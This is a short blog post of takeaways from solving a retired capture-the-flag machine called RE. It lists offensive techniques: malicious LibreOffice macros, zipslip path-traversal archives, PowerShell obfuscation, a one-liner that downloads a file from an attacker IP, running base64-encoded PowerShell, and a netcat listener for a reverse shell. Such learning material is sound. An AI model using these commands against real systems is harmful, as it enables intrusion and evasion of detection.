Updated:November 3, 2021 pm

Takeaways from RE box

The Re box created from 0xdf was retired later this day. I did solve the box after it was retired so now I am going to show you some key things I learned from this box. A list of these is here:

  • Sometimes smbmap may throw false postivies. I always try to use smbclient.

  • libreoffice calc also support macros, we can run malicious command from these docs.

  • We can use [Invoke-Obfuscation]( for powershell obfuscation) for powershell obfuscation

  • The famous yara rules I saw on twitter but never took the chance to search it. Yara rules are basically a way to search for some common strings you provide to yara in order to identify malicious programs/files.

  • I almost forgot about .ace files and winrar, and zipslip. This exploit was used on the box to go from one user to another. We had to create a malicious .zip file which contains inside a malicious file with a path traversal as filename.

  • UPX I used this tool to make chisel.exe a little bit smaller. I have seen this from ippsec

  • We can download file from powershell by using iwr -uri ip/file -outfile filename.evil

  • We can run base64 encoded powershell commands but we need to use convert the strings to utf16 little endian using the command: iconv -t utf-16le and then pipe it to base64. After we can run the command by using powershell -encodedcommand base64string==

  • Use rlwrap -nc -nvlp 7979 to have working arrow keys on windows.

  • WinPeas
    Like LinEnum but for windows.

Thats all. I didn’t do the uninteded way. If you want to learn more goto 0xdf blog or see ippsec videos.